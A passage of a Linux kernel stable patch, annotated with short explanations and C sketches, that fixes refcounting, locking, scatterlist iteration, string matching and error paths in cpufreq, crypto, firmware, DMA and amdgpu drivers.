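The goto skip_test/cpufreq_cpu_put() reshuffle above exists because cpufreq_cpu_get() takes a reference on the policy that every early return used to leak. The balanced shape, as a hedged sketch with a hypothetical check:

#include <linux/cpufreq.h>

/* Hypothetical predicate standing in for the unit-test checks. */
static bool some_check_fails(struct cpufreq_policy *policy)
{
	return false;
}

static void check_all_cpus(void)
{
	int cpu;

	for_each_possible_cpu(cpu) {
		struct cpufreq_policy *policy = cpufreq_cpu_get(cpu);

		if (!policy)
			continue;

		if (some_check_fails(policy)) {
			cpufreq_cpu_put(policy);	/* error exit drops the ref */
			return;
		}

		cpufreq_cpu_put(policy);		/* and so does the normal path */
	}
}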
+diff --git a/drivers/cpufreq/brcmstb-avs-cpufreq.c b/drivers/cpufreq/brcmstb-avs-cpufreq.c
+index 4153150e20db5..f644c5e325fb2 100644
+--- a/drivers/cpufreq/brcmstb-avs-cpufreq.c
++++ b/drivers/cpufreq/brcmstb-avs-cpufreq.c
+@@ -434,7 +434,11 @@ brcm_avs_get_freq_table(struct device *dev, struct private_data *priv)
+ 	if (ret)
+ 		return ERR_PTR(ret);
+ 
+-	table = devm_kcalloc(dev, AVS_PSTATE_MAX + 1, sizeof(*table),
++	/*
++	 * We allocate space for the 5 different AVS P-states,
++	 * plus extra space for a terminating element.
++	 */
++	table = devm_kcalloc(dev, AVS_PSTATE_MAX + 1 + 1, sizeof(*table),
+ 			     GFP_KERNEL);
+ 	if (!table)
+ 		return ERR_PTR(-ENOMEM);
+diff --git a/drivers/cpufreq/cpufreq.c b/drivers/cpufreq/cpufreq.c
+index 285ba51b31f60..c8912756fc06d 100644
+--- a/drivers/cpufreq/cpufreq.c
++++ b/drivers/cpufreq/cpufreq.c
+@@ -450,8 +450,10 @@ void cpufreq_freq_transition_end(struct cpufreq_policy *policy,
+ 			    policy->cur,
+ 			    policy->cpuinfo.max_freq);
+ 
++	spin_lock(&policy->transition_lock);
+ 	policy->transition_ongoing = false;
+ 	policy->transition_task = NULL;
++	spin_unlock(&policy->transition_lock);
+ 
+ 	wake_up(&policy->transition_wait);
+ }
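
The locking fix above closes a race: the begin side inspects transition_ongoing under transition_lock, so the end side must clear it and transition_task under the same lock. A simplified sketch of the begin/end protocol (the real begin path re-checks under the lock and loops; field names follow struct cpufreq_policy):

#include <linux/cpufreq.h>
#include <linux/sched.h>

static void transition_begin(struct cpufreq_policy *policy)
{
	wait_event(policy->transition_wait, !policy->transition_ongoing);

	spin_lock(&policy->transition_lock);
	policy->transition_ongoing = true;
	policy->transition_task = current;
	spin_unlock(&policy->transition_lock);
}

static void transition_end(struct cpufreq_policy *policy)
{
	/* pair the clear with the same lock the begin side takes */
	spin_lock(&policy->transition_lock);
	policy->transition_ongoing = false;
	policy->transition_task = NULL;
	spin_unlock(&policy->transition_lock);

	wake_up(&policy->transition_wait);
}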
+diff --git a/drivers/cpufreq/intel_pstate.c b/drivers/cpufreq/intel_pstate.c
+index d51f90f55c05c..fbe3a40987438 100644
+--- a/drivers/cpufreq/intel_pstate.c
++++ b/drivers/cpufreq/intel_pstate.c
+@@ -2574,6 +2574,11 @@ static int intel_pstate_set_policy(struct cpufreq_policy *policy)
+ 			intel_pstate_clear_update_util_hook(policy->cpu);
+ 		intel_pstate_hwp_set(policy->cpu);
+ 	}
++	/*
++	 * policy->cur is never updated by the intel_pstate driver, but it
++	 * is still read elsewhere as a (stale) frequency value. So, keep
++	 * it within limits.
++	 */
++	policy->cur = policy->min;
+ 
+ 	mutex_unlock(&intel_pstate_limits_lock);
+ 
+diff --git a/drivers/cpufreq/powernow-k8.c b/drivers/cpufreq/powernow-k8.c
+index d289036beff23..b10f7a1b77f11 100644
+--- a/drivers/cpufreq/powernow-k8.c
++++ b/drivers/cpufreq/powernow-k8.c
+@@ -1101,7 +1101,8 @@ static int powernowk8_cpu_exit(struct cpufreq_policy *pol)
+ 
+ 	kfree(data->powernow_table);
+ 	kfree(data);
+-	for_each_cpu(cpu, pol->cpus)
++	/* pol->cpus will be empty here, use related_cpus instead. */
++	for_each_cpu(cpu, pol->related_cpus)
+ 		per_cpu(powernow_data, cpu) = NULL;
+ 
+ 	return 0;
+diff --git a/drivers/cpuidle/cpuidle-pseries.c b/drivers/cpuidle/cpuidle-pseries.c
+index 7e7ab5597d7ac..0590001db6532 100644
+--- a/drivers/cpuidle/cpuidle-pseries.c
++++ b/drivers/cpuidle/cpuidle-pseries.c
+@@ -410,13 +410,7 @@ static int __init pseries_idle_probe(void)
+ 		return -ENODEV;
+ 
+ 	if (firmware_has_feature(FW_FEATURE_SPLPAR)) {
+-		/*
+-		 * Use local_paca instead of get_lppaca() since
+-		 * preemption is not disabled, and it is not required in
+-		 * fact, since lppaca_ptr does not need to be the value
+-		 * associated to the current CPU, it can be from any CPU.
+-		 */
+-		if (lppaca_shared_proc(local_paca->lppaca_ptr)) {
++		if (lppaca_shared_proc()) {
+ 			cpuidle_state_table = shared_states;
+ 			max_idle_state = ARRAY_SIZE(shared_states);
+ 		} else {
+diff --git a/drivers/crypto/caam/caampkc.c b/drivers/crypto/caam/caampkc.c
+index 8867275767101..51b48b57266a6 100644
+--- a/drivers/crypto/caam/caampkc.c
++++ b/drivers/crypto/caam/caampkc.c
+@@ -223,7 +223,9 @@ static int caam_rsa_count_leading_zeros(struct scatterlist *sgl,
+ 		if (len && *buff)
+ 			break;
+ 
+-		sg_miter_next(&miter);
++		if (!sg_miter_next(&miter))
++			break;
++
+ 		buff = miter.addr;
+ 		len = miter.length;
+ 
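
The caampkc fix above stops the scatterlist walk once sg_miter_next() reports exhaustion instead of reading stale iterator state. A hedged sketch of correct sg_miter iteration doing a similar leading-zero count:

#include <linux/scatterlist.h>
#include <linux/types.h>

static size_t count_leading_zero_bytes(struct scatterlist *sgl, int nents)
{
	struct sg_mapping_iter miter;
	size_t zeros = 0;

	sg_miter_start(&miter, sgl, nents, SG_MITER_FROM_SG);
	while (sg_miter_next(&miter)) {		/* stop when exhausted */
		const u8 *p = miter.addr;
		size_t i;

		for (i = 0; i < miter.length; i++, zeros++)
			if (p[i])
				goto out;
	}
out:
	sg_miter_finish(&miter);
	return zeros;
}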
+diff --git a/drivers/crypto/qat/qat_common/adf_gen4_pm.h b/drivers/crypto/qat/qat_common/adf_gen4_pm.h
+index f8f8a9ee29e5b..db4326933d1c0 100644
+--- a/drivers/crypto/qat/qat_common/adf_gen4_pm.h
++++ b/drivers/crypto/qat/qat_common/adf_gen4_pm.h
+@@ -35,7 +35,7 @@
+ #define ADF_GEN4_PM_MSG_PENDING			BIT(0)
+ #define ADF_GEN4_PM_MSG_PAYLOAD_BIT_MASK	GENMASK(28, 1)
+ 
+-#define ADF_GEN4_PM_DEFAULT_IDLE_FILTER		(0x0)
++#define ADF_GEN4_PM_DEFAULT_IDLE_FILTER		(0x6)
+ #define ADF_GEN4_PM_MAX_IDLE_FILTER		(0x7)
+ 
+ int adf_gen4_enable_pm(struct adf_accel_dev *accel_dev);
+diff --git a/drivers/crypto/stm32/stm32-hash.c b/drivers/crypto/stm32/stm32-hash.c
+index d33006d43f761..4df5330afaa1d 100644
+--- a/drivers/crypto/stm32/stm32-hash.c
++++ b/drivers/crypto/stm32/stm32-hash.c
+@@ -565,9 +565,9 @@ static int stm32_hash_dma_send(struct stm32_hash_dev *hdev)
+ 	}
+ 
+ 	for_each_sg(rctx->sg, tsg, rctx->nents, i) {
++		sg[0] = *tsg;
+ 		len = sg->length;
+ 
+-		sg[0] = *tsg;
+ 		if (sg_is_last(sg)) {
+ 			if (hdev->dma_mode == 1) {
+ 				len = (ALIGN(sg->length, 16) - 16);
+@@ -1566,9 +1566,7 @@ static int stm32_hash_remove(struct platform_device *pdev)
+ 	if (!hdev)
+ 		return -ENODEV;
+ 
+-	ret = pm_runtime_resume_and_get(hdev->dev);
+-	if (ret < 0)
+-		return ret;
++	ret = pm_runtime_get_sync(hdev->dev);
+ 
+ 	stm32_hash_unregister_algs(hdev);
+ 
+@@ -1584,7 +1582,8 @@ static int stm32_hash_remove(struct platform_device *pdev)
+ 	pm_runtime_disable(hdev->dev);
+ 	pm_runtime_put_noidle(hdev->dev);
+ 
+-	clk_disable_unprepare(hdev->clk);
++	if (ret >= 0)
++		clk_disable_unprepare(hdev->clk);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/devfreq/devfreq.c b/drivers/devfreq/devfreq.c
+index 8c5f6f7fca112..fe6644f998872 100644
+--- a/drivers/devfreq/devfreq.c
++++ b/drivers/devfreq/devfreq.c
+@@ -763,6 +763,7 @@ static void devfreq_dev_release(struct device *dev)
+ 		dev_pm_opp_put_opp_table(devfreq->opp_table);
+ 
+ 	mutex_destroy(&devfreq->lock);
++	srcu_cleanup_notifier_head(&devfreq->transition_notifier_list);
+ 	kfree(devfreq);
+ }
+ 
+diff --git a/drivers/dma/Kconfig b/drivers/dma/Kconfig
+index b64ae02c26f8c..81de833ccd041 100644
+--- a/drivers/dma/Kconfig
++++ b/drivers/dma/Kconfig
+@@ -210,6 +210,7 @@ config FSL_DMA
+ config FSL_EDMA
+ 	tristate "Freescale eDMA engine support"
+ 	depends on OF
++	depends on HAS_IOMEM
+ 	select DMA_ENGINE
+ 	select DMA_VIRTUAL_CHANNELS
+ 	help
+@@ -279,6 +280,7 @@ config IMX_SDMA
+ 
+ config INTEL_IDMA64
+ 	tristate "Intel integrated DMA 64-bit support"
++	depends on HAS_IOMEM
+ 	select DMA_ENGINE
+ 	select DMA_VIRTUAL_CHANNELS
+ 	help
+diff --git a/drivers/dma/idxd/sysfs.c b/drivers/dma/idxd/sysfs.c
+index 18cd8151dee02..6e1e14b376e65 100644
+--- a/drivers/dma/idxd/sysfs.c
++++ b/drivers/dma/idxd/sysfs.c
+@@ -1426,7 +1426,7 @@ static ssize_t pasid_enabled_show(struct device *dev,
+ {
+ 	struct idxd_device *idxd = confdev_to_idxd(dev);
+ 
+-	return sysfs_emit(buf, "%u\n", device_pasid_enabled(idxd));
++	return sysfs_emit(buf, "%u\n", device_user_pasid_enabled(idxd));
+ }
+ static DEVICE_ATTR_RO(pasid_enabled);
+ 
+diff --git a/drivers/dma/ste_dma40.c b/drivers/dma/ste_dma40.c
+index f093e08c23b16..3b09fdc507e04 100644
+--- a/drivers/dma/ste_dma40.c
++++ b/drivers/dma/ste_dma40.c
+@@ -3597,6 +3597,10 @@ static int __init d40_probe(struct platform_device *pdev)
+ 	spin_lock_init(&base->lcla_pool.lock);
+ 
+ 	base->irq = platform_get_irq(pdev, 0);
++	if (base->irq < 0) {
++		ret = base->irq;
++		goto destroy_cache;
++	}
+ 
+ 	ret = request_irq(base->irq, d40_handle_interrupt, 0, D40_NAME, base);
+ 	if (ret) {
+diff --git a/drivers/edac/igen6_edac.c b/drivers/edac/igen6_edac.c
+index a07bbfd075d06..8ec70da8d84fe 100644
+--- a/drivers/edac/igen6_edac.c
++++ b/drivers/edac/igen6_edac.c
+@@ -27,7 +27,7 @@
+ #include "edac_mc.h"
+ #include "edac_module.h"
+ 
+-#define IGEN6_REVISION	"v2.5"
++#define IGEN6_REVISION	"v2.5.1"
+ 
+ #define EDAC_MOD_STR	"igen6_edac"
+ #define IGEN6_NMI_NAME	"igen6_ibecc"
+@@ -1216,9 +1216,6 @@ static int igen6_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	INIT_WORK(&ecclog_work, ecclog_work_cb);
+ 	init_irq_work(&ecclog_irq_work, ecclog_irq_work_cb);
+ 
+-	/* Check if any pending errors before registering the NMI handler */
+-	ecclog_handler();
+-
+ 	rc = register_err_handler();
+ 	if (rc)
+ 		goto fail3;
+@@ -1230,6 +1227,9 @@ static int igen6_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 		goto fail4;
+ 	}
+ 
++	/* Check if there are any pending errors before/during the registration of the error handler */
++	ecclog_handler();
++
+ 	igen6_debug_setup();
+ 	return 0;
+ fail4:
+diff --git a/drivers/extcon/Kconfig b/drivers/extcon/Kconfig
+index 290186e44e6bd..4dd52a6a5b48d 100644
+--- a/drivers/extcon/Kconfig
++++ b/drivers/extcon/Kconfig
+@@ -62,6 +62,7 @@ config EXTCON_INTEL_CHT_WC
+ 	tristate "Intel Cherrytrail Whiskey Cove PMIC extcon driver"
+ 	depends on INTEL_SOC_PMIC_CHTWC
+ 	depends on USB_SUPPORT
++	depends on POWER_SUPPLY
+ 	select USB_ROLE_SWITCH
+ 	help
+ 	  Say Y here to enable extcon support for charger detection / control
+diff --git a/drivers/firmware/arm_sdei.c b/drivers/firmware/arm_sdei.c
+index f9040bd610812..285fe7ad490d1 100644
+--- a/drivers/firmware/arm_sdei.c
++++ b/drivers/firmware/arm_sdei.c
+@@ -1095,3 +1095,22 @@ int sdei_event_handler(struct pt_regs *regs,
+ 	return err;
+ }
+ NOKPROBE_SYMBOL(sdei_event_handler);
++
++void sdei_handler_abort(void)
++{
++	/*
++	 * If the crash happened in an SDEI event handler then we need to
++	 * finish the handler with the firmware so that we can have working
++	 * interrupts in the crash kernel.
++	 */
++	if (__this_cpu_read(sdei_active_critical_event)) {
++		pr_warn("still in SDEI critical event context, attempting to finish handler.\n");
++		__sdei_handler_abort();
++		__this_cpu_write(sdei_active_critical_event, NULL);
++	}
++	if (__this_cpu_read(sdei_active_normal_event)) {
++		pr_warn("still in SDEI normal event context, attempting to finish handler.\n");
++		__sdei_handler_abort();
++		__this_cpu_write(sdei_active_normal_event, NULL);
++	}
++}
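
sdei_handler_abort() above relies on per-CPU bookkeeping of the in-flight event (sdei_active_critical_event / sdei_active_normal_event, maintained by the handler entry and exit paths), so a crash path can detect "still inside a handler on this CPU" and tell the firmware to abandon it. The general per-CPU marker pattern, sketched with hypothetical names:

#include <linux/percpu.h>

static DEFINE_PER_CPU(void *, active_event);

static void handler_enter(void *event)
{
	__this_cpu_write(active_event, event);
}

static void handler_exit(void)
{
	__this_cpu_write(active_event, NULL);
}

static bool handler_still_active(void)
{
	return __this_cpu_read(active_event) != NULL;
}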
+diff --git a/drivers/firmware/cirrus/cs_dsp.c b/drivers/firmware/cirrus/cs_dsp.c
+index 81cc3d0f6eec1..81c5f94b1be11 100644
+--- a/drivers/firmware/cirrus/cs_dsp.c
++++ b/drivers/firmware/cirrus/cs_dsp.c
+@@ -939,7 +939,8 @@ static int cs_dsp_create_control(struct cs_dsp *dsp,
+ 		    ctl->alg_region.alg == alg_region->alg &&
+ 		    ctl->alg_region.type == alg_region->type) {
+ 			if ((!subname && !ctl->subname) ||
+-			    (subname && !strncmp(ctl->subname, subname, ctl->subname_len))) {
++			    (subname && (ctl->subname_len == subname_len) &&
++			     !strncmp(ctl->subname, subname, ctl->subname_len))) {
+ 				if (!ctl->enabled)
+ 					ctl->enabled = 1;
+ 				return 0;
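
The cs_dsp fix above adds a length comparison because strncmp() bounded by one string's length is a prefix match, not an equality test. A runnable userspace demonstration:

#include <stdbool.h>
#include <stdio.h>
#include <string.h>

static bool match_buggy(const char *have, size_t have_len, const char *want)
{
	return !strncmp(have, want, have_len);	/* prefix match! */
}

static bool match_fixed(const char *have, size_t have_len, const char *want)
{
	return have_len == strlen(want) && !strncmp(have, want, have_len);
}

int main(void)
{
	/* a control named "VOL" must not match one named "VOLUME" */
	printf("buggy: %d\n", match_buggy("VOL", 3, "VOLUME"));	/* 1: wrong */
	printf("fixed: %d\n", match_fixed("VOL", 3, "VOLUME"));	/* 0: right */
	return 0;
}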
+diff --git a/drivers/firmware/efi/libstub/x86-stub.c b/drivers/firmware/efi/libstub/x86-stub.c
+index 33a7811e12c65..4f0152b11a890 100644
+--- a/drivers/firmware/efi/libstub/x86-stub.c
++++ b/drivers/firmware/efi/libstub/x86-stub.c
+@@ -61,7 +61,7 @@ preserve_pci_rom_image(efi_pci_io_protocol_t *pci, struct pci_setup_rom **__rom)
+ 	rom->data.type	= SETUP_PCI;
+ 	rom->data.len	= size - sizeof(struct setup_data);
+ 	rom->data.next	= 0;
+-	rom->pcilen	= pci->romsize;
++	rom->pcilen	= romsize;
+ 	*__rom = rom;
+ 
+ 	status = efi_call_proto(pci, pci.read, EfiPciIoWidthUint16,
+diff --git a/drivers/firmware/meson/meson_sm.c b/drivers/firmware/meson/meson_sm.c
+index 77aa5c6398aa6..d081a6312627b 100644
+--- a/drivers/firmware/meson/meson_sm.c
++++ b/drivers/firmware/meson/meson_sm.c
+@@ -292,6 +292,8 @@ static int __init meson_sm_probe(struct platform_device *pdev)
+ 		return -ENOMEM;
+ 
+ 	chip = of_match_device(meson_sm_ids, dev)->data;
++	if (!chip)
++		return -EINVAL;
+ 
+ 	if (chip->cmd_shmem_in_base) {
+ 		fw->sm_shmem_in_base = meson_sm_map_shmem(chip->cmd_shmem_in_base,
+diff --git a/drivers/firmware/ti_sci.c b/drivers/firmware/ti_sci.c
+index 6281e7153b475..4c550cfbc086c 100644
+--- a/drivers/firmware/ti_sci.c
++++ b/drivers/firmware/ti_sci.c
+@@ -97,7 +97,6 @@ struct ti_sci_desc {
+  * @node:	list head
+  * @host_id:	Host ID
+  * @users:	Number of users of this instance
+- * @is_suspending: Flag set to indicate in suspend path.
+  */
+ struct ti_sci_info {
+ 	struct device *dev;
+@@ -116,7 +115,6 @@ struct ti_sci_info {
+ 	u8 host_id;
+ 	/* protected by ti_sci_list_mutex */
+ 	int users;
+-	bool is_suspending;
+ };
+ 
+ #define cl_to_ti_sci_info(c)	container_of(c, struct ti_sci_info, cl)
+@@ -418,14 +416,14 @@ static inline int ti_sci_do_xfer(struct ti_sci_info *info,
+ 
+ 	ret = 0;
+ 
+-	if (!info->is_suspending) {
++	if (system_state <= SYSTEM_RUNNING) {
+ 		/* And we wait for the response. */
+ 		timeout = msecs_to_jiffies(info->desc->max_rx_timeout_ms);
+ 		if (!wait_for_completion_timeout(&xfer->done, timeout))
+ 			ret = -ETIMEDOUT;
+ 	} else {
+ 		/*
+-		 * If we are suspending, we cannot use wait_for_completion_timeout
+		 * If the system is no longer running, we cannot use wait_for_completion_timeout
+ 		 * during noirq phase, so we must manually poll the completion.
+ 		 */
+ 		ret = read_poll_timeout_atomic(try_wait_for_completion, done_state,
+@@ -3282,35 +3280,6 @@ static int tisci_reboot_handler(struct notifier_block *nb, unsigned long mode,
+ 	return NOTIFY_BAD;
+ }
+ 
+-static void ti_sci_set_is_suspending(struct ti_sci_info *info, bool is_suspending)
+-{
+-	info->is_suspending = is_suspending;
+-}
+-
+-static int ti_sci_suspend(struct device *dev)
+-{
+-	struct ti_sci_info *info = dev_get_drvdata(dev);
+-	/*
+-	 * We must switch operation to polled mode now as drivers and the genpd
+-	 * layer may make late TI SCI calls to change clock and device states
+-	 * from the noirq phase of suspend.
+-	 */
+-	ti_sci_set_is_suspending(info, true);
+-
+-	return 0;
+-}
+-
+-static int ti_sci_resume(struct device *dev)
+-{
+-	struct ti_sci_info *info = dev_get_drvdata(dev);
+-
+-	ti_sci_set_is_suspending(info, false);
+-
+-	return 0;
+-}
+-
+-static DEFINE_SIMPLE_DEV_PM_OPS(ti_sci_pm_ops, ti_sci_suspend, ti_sci_resume);
+-
+ /* Description for K2G */
+ static const struct ti_sci_desc ti_sci_pmmc_k2g_desc = {
+ 	.default_host_id = 2,
+@@ -3519,7 +3488,6 @@ static struct platform_driver ti_sci_driver = {
+ 	.driver = {
+ 		   .name = "ti-sci",
+ 		   .of_match_table = of_match_ptr(ti_sci_of_match),
+-		   .pm = &ti_sci_pm_ops,
+ 	},
+ };
+ module_platform_driver(ti_sci_driver);
+diff --git a/drivers/fsi/fsi-master-aspeed.c b/drivers/fsi/fsi-master-aspeed.c
+index 7cec1772820d3..5eccab175e86b 100644
+--- a/drivers/fsi/fsi-master-aspeed.c
++++ b/drivers/fsi/fsi-master-aspeed.c
+@@ -454,6 +454,8 @@ static ssize_t cfam_reset_store(struct device *dev, struct device_attribute *att
+ 	gpiod_set_value(aspeed->cfam_reset_gpio, 1);
+ 	usleep_range(900, 1000);
+ 	gpiod_set_value(aspeed->cfam_reset_gpio, 0);
++	usleep_range(900, 1000);
++	opb_writel(aspeed, ctrl_base + FSI_MRESP0, cpu_to_be32(FSI_MRESP_RST_ALL_MASTER));
+ 	mutex_unlock(&aspeed->lock);
+ 	trace_fsi_master_aspeed_cfam_reset(false);
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index e6427a00cf6d6..9aac9e755609d 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -1212,6 +1212,9 @@ int amdgpu_device_resize_fb_bar(struct amdgpu_device *adev)
+ 	u16 cmd;
+ 	int r;
+ 
++	if (!IS_ENABLED(CONFIG_PHYS_ADDR_T_64BIT))
++		return 0;
++
+ 	/* Bypass for VF */
+ 	if (amdgpu_sriov_vf(adev))
+ 		return 0;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_kms.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_kms.c
+index 4e42dcb1950f7..9e3313dd956ae 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_kms.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_kms.c
+@@ -554,6 +554,7 @@ int amdgpu_info_ioctl(struct drm_device *dev, void *data, struct drm_file *filp)
+ 			crtc = (struct drm_crtc *)minfo->crtcs[i];
+ 			if (crtc && crtc->base.id == info->mode_crtc.id) {
+ 				struct amdgpu_crtc *amdgpu_crtc = to_amdgpu_crtc(crtc);
++
+ 				ui32 = amdgpu_crtc->crtc_id;
+ 				found = 1;
+ 				break;
+@@ -572,7 +573,7 @@ int amdgpu_info_ioctl(struct drm_device *dev, void *data, struct drm_file *filp)
+ 		if (ret)
+ 			return ret;
+ 
+-		ret = copy_to_user(out, &ip, min((size_t)size, sizeof(ip)));
++		ret = copy_to_user(out, &ip, min_t(size_t, size, sizeof(ip)));
+ 		return ret ? -EFAULT : 0;
+ 	}
+ 	case AMDGPU_INFO_HW_IP_COUNT: {
+@@ -718,17 +719,18 @@ int amdgpu_info_ioctl(struct drm_device *dev, void *data, struct drm_file *filp)
+ 				    ? -EFAULT : 0;
+ 	}
+ 	case AMDGPU_INFO_READ_MMR_REG: {
+-		unsigned n, alloc_size;
++		unsigned int n, alloc_size;
+ 		uint32_t *regs;
+-		unsigned se_num = (info->read_mmr_reg.instance >>
++		unsigned int se_num = (info->read_mmr_reg.instance >>
+ 				   AMDGPU_INFO_MMR_SE_INDEX_SHIFT) &
+ 				  AMDGPU_INFO_MMR_SE_INDEX_MASK;
+-		unsigned sh_num = (info->read_mmr_reg.instance >>
++		unsigned int sh_num = (info->read_mmr_reg.instance >>
+ 				   AMDGPU_INFO_MMR_SH_INDEX_SHIFT) &
+ 				  AMDGPU_INFO_MMR_SH_INDEX_MASK;
+ 
+ 		/* set full masks if the userspace set all bits
+-		 * in the bitfields */
++		 * in the bitfields
++		 */
+ 		if (se_num == AMDGPU_INFO_MMR_SE_INDEX_MASK)
+ 			se_num = 0xffffffff;
+ 		else if (se_num >= AMDGPU_GFX_MAX_SE)
+@@ -852,7 +854,7 @@ int amdgpu_info_ioctl(struct drm_device *dev, void *data, struct drm_file *filp)
+ 		return ret;
+ 	}
+ 	case AMDGPU_INFO_VCE_CLOCK_TABLE: {
+-		unsigned i;
++		unsigned int i;
+ 		struct drm_amdgpu_info_vce_clock_table vce_clk_table = {};
+ 		struct amd_vce_state *vce_state;
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/cik.c b/drivers/gpu/drm/amd/amdgpu/cik.c
+index de6d10390ab2f..9be6da37032a7 100644
+--- a/drivers/gpu/drm/amd/amdgpu/cik.c
++++ b/drivers/gpu/drm/amd/amdgpu/cik.c
+@@ -1574,17 +1574,8 @@ static void cik_pcie_gen3_enable(struct amdgpu_device *adev)
+ 			u16 bridge_cfg2, gpu_cfg2;
+ 			u32 max_lw, current_lw, tmp;
+ 
+-			pcie_capability_read_word(root, PCI_EXP_LNKCTL,
+-						  &bridge_cfg);
+-			pcie_capability_read_word(adev->pdev, PCI_EXP_LNKCTL,
+-						  &gpu_cfg);
+-
+-			tmp16 = bridge_cfg | PCI_EXP_LNKCTL_HAWD;
+-			pcie_capability_write_word(root, PCI_EXP_LNKCTL, tmp16);
+-
+-			tmp16 = gpu_cfg | PCI_EXP_LNKCTL_HAWD;
+-			pcie_capability_write_word(adev->pdev, PCI_EXP_LNKCTL,
+-						   tmp16);
++			pcie_capability_set_word(root, PCI_EXP_LNKCTL, PCI_EXP_LNKCTL_HAWD);
++			pcie_capability_set_word(adev->pdev, PCI_EXP_LNKCTL, PCI_EXP_LNKCTL_HAWD);
+ 
+ 			tmp = RREG32_PCIE(ixPCIE_LC_STATUS1);
+ 			max_lw = (tmp & PCIE_LC_STATUS1__LC_DETECTED_LINK_WIDTH_MASK) >>
+@@ -1637,21 +1628,14 @@ static void cik_pcie_gen3_enable(struct amdgpu_device *adev)
+ 				msleep(100);
+ 
+ 				/* linkctl */
+-				pcie_capability_read_word(root, PCI_EXP_LNKCTL,
+-							  &tmp16);
+-				tmp16 &= ~PCI_EXP_LNKCTL_HAWD;
+-				tmp16 |= (bridge_cfg & PCI_EXP_LNKCTL_HAWD);
+-				pcie_capability_write_word(root, PCI_EXP_LNKCTL,
+-							   tmp16);
+-
+-				pcie_capability_read_word(adev->pdev,
+-							  PCI_EXP_LNKCTL,
+-							  &tmp16);
+-				tmp16 &= ~PCI_EXP_LNKCTL_HAWD;
+-				tmp16 |= (gpu_cfg & PCI_EXP_LNKCTL_HAWD);
+-				pcie_capability_write_word(adev->pdev,
+-							   PCI_EXP_LNKCTL,
+-							   tmp16);
++				pcie_capability_clear_and_set_word(root, PCI_EXP_LNKCTL,
++								   PCI_EXP_LNKCTL_HAWD,
++								   bridge_cfg &
++								   PCI_EXP_LNKCTL_HAWD);
++				pcie_capability_clear_and_set_word(adev->pdev, PCI_EXP_LNKCTL,
++								   PCI_EXP_LNKCTL_HAWD,
++								   gpu_cfg &
++								   PCI_EXP_LNKCTL_HAWD);
+ 
+ 				/* linkctl2 */
+ 				pcie_capability_read_word(root, PCI_EXP_LNKCTL2,
+diff --git a/drivers/gpu/drm/amd/amdgpu/psp_v13_0.c b/drivers/gpu/drm/amd/amdgpu/psp_v13_0.c
+index 8c5fa4b7b68a2..c7cb30efe43de 100644
+--- a/drivers/gpu/drm/amd/amdgpu/psp_v13_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/psp_v13_0.c
+@@ -147,14 +147,15 @@ static int psp_v13_0_wait_for_bootloader(struct psp_context *psp)
+ 	int ret;
+ 	int retry_loop;
+ 
++	/* Wait for bootloader to signify that it is ready having bit 31 of
++	 * C2PMSG_35 set to 1. All other bits are expected to be cleared.
++	 * If there is an error in processing command, bits[7:0] will be set.
++	 * This is applicable for PSP v13.0.6 and newer.
++	 */
+ 	for (retry_loop = 0; retry_loop < 10; retry_loop++) {
+-		/* Wait for bootloader to signify that is
+-		    ready having bit 31 of C2PMSG_35 set to 1 */
+-		ret = psp_wait_for(psp,
+-				   SOC15_REG_OFFSET(MP0, 0, regMP0_SMN_C2PMSG_35),
+-				   0x80000000,
+-				   0x80000000,
+-				   false);
++		ret = psp_wait_for(
++			psp, SOC15_REG_OFFSET(MP0, 0, regMP0_SMN_C2PMSG_35),
++			0x80000000, 0xffffffff, false);
+ 
+ 		if (ret == 0)
+ 			return 0;
+diff --git a/drivers/gpu/drm/amd/amdgpu/si.c b/drivers/gpu/drm/amd/amdgpu/si.c
+index 7f99e130acd06..fd34c2100bd96 100644
+--- a/drivers/gpu/drm/amd/amdgpu/si.c
++++ b/drivers/gpu/drm/amd/amdgpu/si.c
+@@ -2276,17 +2276,8 @@ static void si_pcie_gen3_enable(struct amdgpu_device *adev)
+ 			u16 bridge_cfg2, gpu_cfg2;
+ 			u32 max_lw, current_lw, tmp;
+ 
+-			pcie_capability_read_word(root, PCI_EXP_LNKCTL,
+-						  &bridge_cfg);
+-			pcie_capability_read_word(adev->pdev, PCI_EXP_LNKCTL,
+-						  &gpu_cfg);
+-
+-			tmp16 = bridge_cfg | PCI_EXP_LNKCTL_HAWD;
+-			pcie_capability_write_word(root, PCI_EXP_LNKCTL, tmp16);
+-
+-			tmp16 = gpu_cfg | PCI_EXP_LNKCTL_HAWD;
+-			pcie_capability_write_word(adev->pdev, PCI_EXP_LNKCTL,
+-						   tmp16);
++			pcie_capability_set_word(root, PCI_EXP_LNKCTL, PCI_EXP_LNKCTL_HAWD);
++			pcie_capability_set_word(adev->pdev, PCI_EXP_LNKCTL, PCI_EXP_LNKCTL_HAWD);
+ 
+ 			tmp = RREG32_PCIE(PCIE_LC_STATUS1);
+ 			max_lw = (tmp & LC_DETECTED_LINK_WIDTH_MASK) >> LC_DETECTED_LINK_WIDTH_SHIFT;
+@@ -2331,21 +2322,14 @@ static void si_pcie_gen3_enable(struct amdgpu_device *adev)
+ 
+ 				mdelay(100);
+ 
+-				pcie_capability_read_word(root, PCI_EXP_LNKCTL,
+-							  &tmp16);
+-				tmp16 &= ~PCI_EXP_LNKCTL_HAWD;
+-				tmp16 |= (bridge_cfg & PCI_EXP_LNKCTL_HAWD);
+-				pcie_capability_write_word(root, PCI_EXP_LNKCTL,
+-							   tmp16);
+-
+-				pcie_capability_read_word(adev->pdev,
+-							  PCI_EXP_LNKCTL,
+-							  &tmp16);
+-				tmp16 &= ~PCI_EXP_LNKCTL_HAWD;
+-				tmp16 |= (gpu_cfg & PCI_EXP_LNKCTL_HAWD);
+-				pcie_capability_write_word(adev->pdev,
+-							   PCI_EXP_LNKCTL,
+-							   tmp16);
++				pcie_capability_clear_and_set_word(root, PCI_EXP_LNKCTL,
